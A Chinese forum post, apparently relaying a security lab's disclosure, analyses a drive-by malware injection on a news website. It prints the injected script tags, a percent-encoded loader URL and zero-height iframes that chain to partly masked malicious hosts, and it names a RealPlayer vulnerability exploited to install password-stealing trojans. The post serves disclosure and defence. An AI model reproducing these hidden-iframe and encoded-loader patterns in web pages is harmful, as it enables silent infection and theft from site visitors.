传媒中国网站挂马事件
02月17日,[url=http://www.3ast.com.cn/][font=Tahoma][size=3][color=#0000ff]3AST安全实验室[/color][/size][/font][/url]发现, 传媒中国网站挂马事件(http://www.cm958.cn/)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。[font=宋体]该网站问题代码:[/font]
[font=宋体]图一:[/font]
[font=宋体][img]http://210.74.145.228/attachment/125_96365_3e017380bb7a893.jpg[/img][/font]
[font=宋体]src='http://www.c****.cn/AD/200708/1.js'></script> </td>[/font]
[font=宋体]http://www.c****.cn/AD/200708/1.js问题框架代码:[font=Tahoma][/font][/font]
[font=宋体]
图二:[/font]
[font=宋体][img]http://210.74.145.228/attachment/125_96365_0a2ccd034a58408.jpg[/img][/font]
[font=宋体][font=宋体]src=http:\/\/%61****2E%61%6C%69%6D%61%6D%61%63%63%2E%63%6E\/%61%64%5F%30%30%32%31%31%2E%6A%73><\/script>[/font][font=宋体]解密后得到网址:http://ad.****amacc.cn/ad_00211.js [font=Tahoma][/font][/font][/font]
[font=宋体][font=宋体]
[/font][font=宋体]http://ad.****amacc.cn/ad_00211.js[/font][font=宋体]问题框架代码:[/font][/font][font=宋体]
图三:
[img]http://210.74.145.228/attachment/125_96365_41d69d0c7402e0a.jpg[/img]
[font=宋体]<IFRaME src=\"http://ka****.3322.org/b094933/b09.htm\" width=100 height=0>[/font][font=calibri] [font=Tahoma][/font][/font]
[font=calibri]
[/font][font=宋体]http://ka****.3322.org/b094933/b09.htm[/font][font=宋体]问题框架代码:[/font]
图四:
[img]http://210.74.145.228/attachment/125_96365_ab974ed3377613e.jpg[/img]
[font=宋体]<iframe src=new.html height=0 width=100 ></iframe>[/font]
[font=宋体]http://ka****.3322.org/b094933/new.html[/font][font=宋体]网马代码:[/font]
图五:
[img]http://210.74.145.228/attachment/125_96365_f639daf4ee41c4a.jpg[/img]
[font=arial]该网马利用以下漏洞来传播[/font]:
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。[/font] 哈哈
楼主广告没有达到效果把
哈哈
我设置了关键词过滤:victory: :victory:
页:
[1]